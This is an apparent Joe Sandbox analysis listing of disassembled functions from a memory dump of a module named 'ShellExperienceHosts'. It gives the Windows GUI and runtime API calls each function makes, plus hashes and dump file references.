Part of subcall function 6C9DE978: GetCapture.USER32 ref: 6C9DE982
Part of subcall function 6C9DE978: SetCapture.USER32(?), ref: 6C9DE996
Part of subcall function 6C9DE978: GetCapture.USER32 ref: 6C9DE9A2
Part of subcall function 6C9DE978: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6C9DE9C0
Part of subcall function 6C9DE978: DispatchMessageW.USER32(?), ref: 6C9DE9FC
Part of subcall function 6C9DE978: GetCapture.USER32 ref: 6C9DEA5A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Offset$CaptureWindow$Message$InflateLayout$AdjustDesktopDispatchEmptyLockPeekUpdate
String ID:
API String ID: 2444846054-0
Opcode ID: 68f7d0ad34e9d3c612212f44435317d4c2a32f164567da466c881cc0141853b3
Instruction ID: 0affd4568bc0bf366bafaee69405c7b66f68dbb167a1438cc6baf0dad070f7ca
Opcode Fuzzy Hash: 68f7d0ad34e9d3c612212f44435317d4c2a32f164567da466c881cc0141853b3
Instruction Fuzzy Hash: 83E10676E006199FCF05CF98D840AEEBBB2BF4A310F15811AF919BB350DB71A941CB94

Function 6C9E8249 Relevance: 7.9, APIs: 5, Instructions: 357COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6C9E826B
SetRectEmpty.USER32(?), ref: 6C9E82F6
SetRectEmpty.USER32(?), ref: 6C9E8516
GetClientRect.USER32(?,?), ref: 6C9E8573
GetClientRect.USER32(?,?), ref: 6C9E8589

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Empty$Client
String ID:
API String ID: 1457177775-0
Opcode ID: caf326a20e021b2b4aec06479932b2ef90f24c3143a0077c966714d2546d7fc2
Instruction ID: 7ad6c490cb945627c5b9a40f3a3b7c62e08afb0b669a4d25c0fd98d8cb401b8b
Opcode Fuzzy Hash: caf326a20e021b2b4aec06479932b2ef90f24c3143a0077c966714d2546d7fc2
Instruction Fuzzy Hash: 11D12471A00609CFCF0ACFA8C58069EB7F6FF59314F25416AE815BB640DB71E946CBA4

Function 6C9F1DB0 Relevance: 7.7, APIs: 5, Instructions: 200COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9F1DB7
IsWindow.USER32(00000000), ref: 6C9F1DCB
GetClientRect.USER32(00000000,00000000), ref: 6C9F1E20
GetCursorPos.USER32(?), ref: 6C9F1FE9
ScreenToClient.USER32(00000000,?), ref: 6C9F1FF6

Part of subcall function 6C9E5D80: __EH_prolog3_GS.LIBCMT ref: 6C9E5D8A
Part of subcall function 6C9E5D80: GetClientRect.USER32(00000000,00000000), ref: 6C9E5DE4

Part of subcall function 6C9F1422: __EH_prolog3_GS.LIBCMT ref: 6C9F142C
Part of subcall function 6C9F1422: SendMessageW.USER32(00000000,0000040D,00000000,00000000), ref: 6C9F1457

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ClientH_prolog3_$Rect$CursorMessageScreenSendWindow
String ID:
API String ID: 3214297127-0
Opcode ID: 656cd3835dd499d1b6d78ab61b1b14092fdbd8c8010460e07364719b0312e001
Instruction ID: 25007312384e40c7672c94e3963fcd0427267365aa1517d577c446ce648cee46
Opcode Fuzzy Hash: 656cd3835dd499d1b6d78ab61b1b14092fdbd8c8010460e07364719b0312e001
Instruction Fuzzy Hash: B3815BB1E01219CFDF05DFA4C884ADDBBB9BF59308F14016AE815AB655DB30E94ACF60

Function 6C9F5815 Relevance: 7.6, APIs: 5, Instructions: 120COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 6C9F583D

Part of subcall function 6C9C7961: ClientToScreen.USER32(?,?), ref: 6C9C7970
Part of subcall function 6C9C7961: ClientToScreen.USER32(?,?), ref: 6C9C797D

PtInRect.USER32(?,00000000,?), ref: 6C9F5857
PtInRect.USER32(?,?,?), ref: 6C9F58D0

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ClientRect$Screen
String ID:
API String ID: 3187875807-0
Opcode ID: df4981fe433a269d032e73892f1de10076b7ba567fa04a62aca9926a19326b49
Instruction ID: 2c59e3de218954b2cdc78c55f0e440dcef8387141f6136abcf08db82e8d08898
Opcode Fuzzy Hash: df4981fe433a269d032e73892f1de10076b7ba567fa04a62aca9926a19326b49
Instruction Fuzzy Hash: DF415E31A0464AEFCF10CFA8C98499EB7F9EF09358F108565E915FB650D731EA86CB60

Function 6C9EC98A Relevance: 7.6, APIs: 5, Instructions: 116windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 6C9EC9D4
GetParent.USER32(?), ref: 6C9EC9EF
GetParent.USER32(?), ref: 6C9ECA1D
UpdateWindow.USER32(?), ref: 6C9ECAB1
SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C9ECAEE

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Parent$FocusMessageSendUpdateWindow
String ID:
API String ID: 2438739141-0
Opcode ID: 55ca763119e11706ad6fe169124fc9f4c0cccef2c4ab5156d445153ba4266953
Instruction ID: 8ab9d0eea5cd947c48510eaf86c07b362d20052bb88bda520c80208ee4b6f49c
Opcode Fuzzy Hash: 55ca763119e11706ad6fe169124fc9f4c0cccef2c4ab5156d445153ba4266953
Instruction Fuzzy Hash: B54126357007619BCF12EF388888A5D3E79BF6A768F050379EC56ABB95CB70C8018B50

Function 6C9DA906 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9DA90D

Part of subcall function 6C9C7012: __EH_prolog3.LIBCMT ref: 6C9C7019
Part of subcall function 6C9C7012: GetWindowDC.USER32(00000000,00000004,6C9E03E2,00000000), ref: 6C9C7045

Part of subcall function 6C9C815C: SetMapMode.GDI32(?,?), ref: 6C9C8170
Part of subcall function 6C9C815C: SetMapMode.GDI32(?,?), ref: 6C9C8182

LPtoDP.GDI32(?,?,00000001), ref: 6C9DA971
LPtoDP.GDI32(?,?,00000001), ref: 6C9DA990
LPtoDP.GDI32(?,?,00000001), ref: 6C9DA9AF
InvalidateRect.USER32(?,00000000,00000001), ref: 6C9DAA73

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: H_prolog3Mode$InvalidateRectWindow
String ID:
API String ID: 1124340077-0
Opcode ID: 63fd5817accf14eb84b2a7248c338acd254933b1a8486ca98fb91b5e70998372
Instruction ID: e89843bd06aca6afce184e00b450d04b0829fb6b68b4a24e4266cfcd48f2d963
Opcode Fuzzy Hash: 63fd5817accf14eb84b2a7248c338acd254933b1a8486ca98fb91b5e70998372
Instruction Fuzzy Hash: 1341E374600B05DFDB24CF79C581B9AB7F1BF4A304F11855DE5AAAB690EB70A850CB11

Function 6C9C4DDE Relevance: 7.6, APIs: 5, Instructions: 108keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(00000000), ref: 6C9C4DF3
GetKeyState.USER32(00000011), ref: 6C9C4DFB
ScreenToClient.USER32(?,00000000), ref: 6C9C4E93
ClientToScreen.USER32(?,00000000), ref: 6C9C4EE0
SetCursorPos.USER32(00000000,00000000), ref: 6C9C4EEC

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ClientCursorScreen$State
String ID:
API String ID: 3982492586-0
Opcode ID: a0317fbf5186363f52e9b0324ea71acc113ab3c4685359650046877bfe42a15a
Instruction ID: 752ad331e3948221a4e47996923d9fa2ef13a2983693013f9a6e91041ada0a65
Opcode Fuzzy Hash: a0317fbf5186363f52e9b0324ea71acc113ab3c4685359650046877bfe42a15a
Instruction Fuzzy Hash: 0B31A472B01504AFCB188AB8C4946BDBBB9FF46714F12821AE516D7990D730DA508F53

Function 6C9A4EA0 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C9A4EC3
std::_Lockit::_Lockit.LIBCPMT ref: 6C9A4EE6
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9A4F06

Part of subcall function 6C9A2B90: std::_Lockit::_Lockit.LIBCPMT ref: 6C9A2C1A
Part of subcall function 6C9A2B90: __Getctype.LIBCPMT ref: 6C9A2C83
Part of subcall function 6C9A2B90: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6C9A2CB7

std::_Lockit::~_Lockit.LIBCPMT ref: 6C9A4F93
Concurrency::cancel_current_task.LIBCPMT ref: 6C9A4FAB

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskGetctypeLocinfo::_Locinfo_dtor
String ID:
API String ID: 2985560847-0
Opcode ID: 0d9563782cf7351443900b5e371ea755b688b16f8f9b016c524da2258c8c648b
Instruction ID: 5923dc3d1890e923b5c08a175f2b6b77165f9b8408b98a32481973ed63de8cfc
Opcode Fuzzy Hash: 0d9563782cf7351443900b5e371ea755b688b16f8f9b016c524da2258c8c648b
Instruction Fuzzy Hash: 9131A171E012159FCB12CF88D980BAEB774FB4A724F145259E829A7B40DB30A94ACFD1

Function 6C9AA770 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C9AA793
std::_Lockit::_Lockit.LIBCPMT ref: 6C9AA7B6
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9AA7D6
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9AA863
Concurrency::cancel_current_task.LIBCPMT ref: 6C9AA87B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 9d90a0160acdfc888710be76b523ec8dbf67ac37872407016b904a01260d1023
Instruction ID: 2fc58f104a0a7df06e604bac0e742070db86e4a838e7e4bf22551df9fd808f41
Opcode Fuzzy Hash: 9d90a0160acdfc888710be76b523ec8dbf67ac37872407016b904a01260d1023
Instruction Fuzzy Hash: B5316D71E002569FCB15CF98D980AAABB74FB49728F148299E81567B40DB30ED4BCFD1

Function 6C9A5890 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C9A58B3
std::_Lockit::_Lockit.LIBCPMT ref: 6C9A58D6
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9A58F6
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9A5983
Concurrency::cancel_current_task.LIBCPMT ref: 6C9A599B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 9dc9619619e68369aa7830f7780f240d53d3a15c31d870d688f2a3d4ce337f7a
Instruction ID: d2c72d61bbe769290decfef034df57bb66efa0c0fa04ab58aa6790b1413f4e0c
Opcode Fuzzy Hash: 9dc9619619e68369aa7830f7780f240d53d3a15c31d870d688f2a3d4ce337f7a
Instruction Fuzzy Hash: 6831BE72A006559FCB11CF88D980AAEB7B4FB4A334F144659E8146BB40D730ED8ACBD5

Function 6C9F25F6 Relevance: 7.6, APIs: 5, Instructions: 100windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9F25FD
CreatePopupMenu.USER32 ref: 6C9F2613
AppendMenuW.USER32(00000000,?,?,-00000010), ref: 6C9F26E3
AppendMenuW.USER32(00000000,00000000,?,?), ref: 6C9F2705
SetMenuDefaultItem.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000014), ref: 6C9F272E

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Menu$Append$CreateDefaultH_prolog3ItemPopup
String ID:
API String ID: 1187709018-0
Opcode ID: c408f7df4c3b37aefebdca45e159744ea41c0b0020c7f68a37577e83fdeb3ba0
Instruction ID: 32d253fabe139fab156c8acbf7d1e4bd8c1cc93fe283a0f845c50c049ec9fa8a
Opcode Fuzzy Hash: c408f7df4c3b37aefebdca45e159744ea41c0b0020c7f68a37577e83fdeb3ba0
Instruction Fuzzy Hash: CD41C635A0064ADBEF05CBA4C958BFDB7B4BF14308F144018D915B7A80DB34E905CBA1

Function 6C9B6B3B Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 6C9B5CBE: GetParent.USER32(?), ref: 6C9B5CC1
Part of subcall function 6C9B5CBE: GetParent.USER32(00000000), ref: 6C9B5CC8

GetWindowLongW.USER32(?,000000EC), ref: 6C9B6B9B
RedrawWindow.USER32(?,00000000,00000000,00000081,?,?,?,?,?,6C9B61DF,00000000), ref: 6C9B6BEF
SetWindowLongW.USER32(?,000000EC,00000000), ref: 6C9B6BFE
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137,?,?,?,?,?,6C9B61DF,00000000), ref: 6C9B6C14
GetClientRect.USER32(?,?), ref: 6C9B6C28

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$LongParent$ClientRectRedraw
String ID:
API String ID: 556606033-0
Opcode ID: b396c7e4d88b10fcb724c76816d87c81b88a05165b044927ece40fbce16aaba6
Instruction ID: 13cc56d676d7e84fb6a526db38d69a695dc7727e4ce294ef7a5094a85725eb35
Opcode Fuzzy Hash: b396c7e4d88b10fcb724c76816d87c81b88a05165b044927ece40fbce16aaba6
Instruction Fuzzy Hash: 0B21E232705669BBEB094BA0C884AAF7A7DEF19358F100234E925F7690CB74FD10CB80

Function 6C9CC9F4 Relevance: 7.6, APIs: 5, Instructions: 87threadCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9CC9FE

Part of subcall function 6C9CC251: __EH_prolog3.LIBCMT ref: 6C9CC258

GetCurrentThread.KERNEL32 ref: 6C9CCA5D
GetCurrentThreadId.KERNEL32 ref: 6C9CCA66
GetVersionExW.KERNEL32 ref: 6C9CCB02
SysFreeString.OLEAUT32 ref: 6C9CCB56

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CurrentThread$FreeH_prolog3H_prolog3_StringVersion
String ID:
API String ID: 1514388774-0
Opcode ID: 0678d7065c1a7834f4697c638b3ddd73406e1caf6e6913bb710331323e0c2313
Instruction ID: e2030dd8743ca0499ac5d087e0474121209f5438c7107179080eab94d0b288f9
Opcode Fuzzy Hash: 0678d7065c1a7834f4697c638b3ddd73406e1caf6e6913bb710331323e0c2313
Instruction Fuzzy Hash: 1641EFB0A01B44CFD720DF6A858468AFAF4BF58304F90896ED1AEC7B10CB70A549CF42

Function 6C9FAF6B Relevance: 7.6, APIs: 5, Instructions: 86COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 6C9FAFB7

Part of subcall function 6C9BE4A3: GetWindowLongW.USER32(?,000000EC), ref: 6C9BE4B0

OffsetRect.USER32(?,?,00000000), ref: 6C9FB013
UnionRect.USER32(?,?,?), ref: 6C9FB02C
EqualRect.USER32(?,?), ref: 6C9FB03A
UpdateWindow.USER32(?), ref: 6C9FB071

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Window$EqualLongOffsetUnionUpdate
String ID:
API String ID: 4261707372-0
Opcode ID: c51fa0d6da2ca76a0932c04d61e52f2a82f54cdc2b2afe4b346a938421c3c3fb
Instruction ID: 04a1424a41a715e27dfc9800859b91f51886133a7f1e7dd7c4205026d7b31a56
Opcode Fuzzy Hash: c51fa0d6da2ca76a0932c04d61e52f2a82f54cdc2b2afe4b346a938421c3c3fb
Instruction Fuzzy Hash: CD316171B00609EBDB04CFA5C944ADEF7BDBF19318F144216E429E3690DB30E995CB90

Function 6C9F446D Relevance: 7.6, APIs: 5, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 6C9F44B6
GetClientRect.USER32(?,?), ref: 6C9F44E2
PtInRect.USER32(?,?,?), ref: 6C9F44FA
MapWindowPoints.USER32(?,?,?,00000001), ref: 6C9F4523
SendMessageW.USER32(?,00000200,?,?), ref: 6C9F4542

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$ClientCursorMessagePointsSendWindow
String ID:
API String ID: 1257894355-0
Opcode ID: c47be82c3a6e693bd99cf035f754d01f14431324fb5419ad8c467bf0b77ef353
Instruction ID: de28b4f27abc49e118d6ef2022080d704880e43afdf16dd1967b4b581c0ea0e6
Opcode Fuzzy Hash: c47be82c3a6e693bd99cf035f754d01f14431324fb5419ad8c467bf0b77ef353
Instruction Fuzzy Hash: 22319171600249EFDF119FA4C9549BEBBB9FF15314B20422AF93AA6990DB30EA51CF50

Function 6C9BC4ED Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9BC4F7
GetTopWindow.USER32(?), ref: 6C9BC524
GetDlgCtrlID.USER32(00000000), ref: 6C9BC536
SendMessageW.USER32(?,00000087,00000000,00000000), ref: 6C9BC591
GetWindow.USER32(00000000,00000002), ref: 6C9BC5D3

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
